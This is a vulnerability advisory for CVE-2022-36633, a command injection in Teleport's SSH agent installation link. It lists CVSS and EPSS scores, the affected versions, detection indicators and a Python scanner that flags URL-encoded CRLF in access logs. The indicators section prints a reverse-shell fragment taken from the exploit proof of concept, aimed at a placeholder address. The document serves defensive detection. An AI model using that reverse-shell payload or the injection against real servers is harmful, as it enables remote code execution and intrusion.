CVE-2022-36633
published 2022-08-24

Priority: P2 · 75 · high
CVSS 3.1: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Exploit: available
EPSS: 49.48% (98.7th percentile)

Teleport 9.3.6 is vulnerable to command injection leading to remote code execution. An attacker can craft a malicious SSH agent installation link by URL-encoding a bash escape with a carriage return line feed. This URL-encoded payload can be used in place of a token and sent to a user in a social engineering attack. This is a fully unauthenticated attack utilizing the trusted Teleport server to deliver the payload.

Affected

4 ranges

Vendor       Product                  Version range        Fixed in
github.com   gravitational_teleport   >= 0 < 8.3.17        8.3.17
github.com   gravitational_teleport   >= 10.0.0 < 10.1.2   10.1.2
github.com   gravitational_teleport   >= 9.0.0 < 9.3.13    9.3.13
goteleport   teleport                 < 10.1.2             10.1.2

Detection & IOCs (extracted from sources)

Command: /dev/tcp/10.0.0.1/5555 0>&1 #
  • Look for URL-encoded carriage return line feed (CRLF) sequences in Teleport SSH agent installation token parameters — this is the injection vector used to smuggle bash commands into the install link.
  • The attack is fully unauthenticated — monitor Teleport install/token endpoints for anomalous or URL-encoded payloads from unauthenticated sources.
  • Watch for outbound /dev/tcp reverse-shell connections originating from the Teleport server process, indicative of successful RCE via the injected payload.
  • The IP address and port in the exploit PoC (10.0.0.1:5555) are attacker-controlled placeholders — real-world attacks will use different callback IPs/ports; do not rely on these specific values for blocking.
  • The vulnerability was reported against Teleport 9.3.6 but the PoC exploit targets v10.1.1, suggesting the affected version range spans at least 9.3.6–10.1.1.
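
One way to run the first check above over proxy or load-balancer access logs, as an added example that is not from the advisory or the Teleport project: it percent-decodes each request target repeatedly, to catch double encoding, and flags any that decode to a CR or LF. The combined log format, the `/install/<token>` path and all sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
MAX_DECODE_ROUNDS = 3  # catches double/triple encoding such as %250d%250a


def decode_fully(target: str) -> str:
    """Percent-decode repeatedly until the string stops changing."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def has_encoded_crlf(target: str) -> bool:
    """True when percent-decoding the request target yields a CR or LF."""
    return any(c in decode_fully(target) for c in "\r\n")


def scan(lines):
    """Return (line_number, decoded_target) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and has_encoded_crlf(match.group("target")):
            hits.append((number, decode_fully(match.group("target"))))
    return hits


# Constructed sample lines; the /install/<token> path is a hypothetical placeholder.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Aug/2022:10:00:01 +0000] "GET /install/3f9c2ab41d77 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [24/Aug/2022:10:02:17 +0000] "GET /install/abc%0D%0Aecho%20marker%20%23 HTTP/1.1" 200 5173',
    '192.0.2.44 - - [24/Aug/2022:10:02:19 +0000] "GET /install/abc%250d%250aecho%20marker HTTP/1.1" 200 5171',
    '192.0.2.10 - - [24/Aug/2022:10:03:40 +0000] "GET /web/login?next=%2Fnodes HTTP/1.1" 200 911',
]

if __name__ == "__main__":
    for number, decoded in scan(SAMPLE_LOG):
        print(f"line {number}: decoded target {decoded!r}")
```

Point `scan` at the real log lines and adjust `REQUEST_RE` to the log format in use; a hit on an install or token URL is worth correlating with who received that link.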